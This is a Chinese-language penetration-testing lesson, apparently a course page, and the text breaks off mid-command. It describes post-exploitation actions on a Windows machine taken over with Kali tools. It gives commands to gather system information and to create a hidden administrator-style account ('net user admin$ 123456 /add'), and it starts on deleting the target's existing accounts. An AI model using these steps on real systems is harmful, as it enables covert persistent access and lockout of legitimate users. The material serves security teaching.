网络安全工程师演示:原来我的计算机可以这样被为所欲为!
一、课前准备 使用kali工具***Windows目标计算机并获取目标计算机的管理员权限。 二、课程目标 1.通过学习本课程,了解获取Windows目标计算机管理权限后,可以对其进行若干的操作。 2.通过学习本课程,达到充分利用kali工具所获取信息提高后续***测试效率的目标。 三、课程内容 1.远程查看目标计算机的系统信息。 命令:C:\Windows\system32>systeminfo 回车 命令行结果显示界面:(因不支持中文编译,故界面出现乱码,在CMD中输入chcp65001) 2.在目标计算机中远程创建隐藏账户。 命令:C:\Windows\system32>net user 用户名$ 密码 /add 回车 例子:C:\Windows\system32>net user admin$ 123456 /add 命令行结果显示界面: 附加知识:①加$,创建账户为隐藏账户;不加$,创建账户为普通账户。(通过加$符号创建的隐藏账户只是无法通过 net user 命令查看,但仍能通过图形界面查看。如需创建真正隐藏账户,需要进行注册表相关操作,后续课程将为大家详细介绍。) ②在目标计算机中查看通过加$符号创建的隐藏账户。 查看步骤:目标计算机->控制面板->用户账户和家庭安全->用户账户->管理账户 3.远程删除目标计算机中已存在的账号。 命令:C:\Windows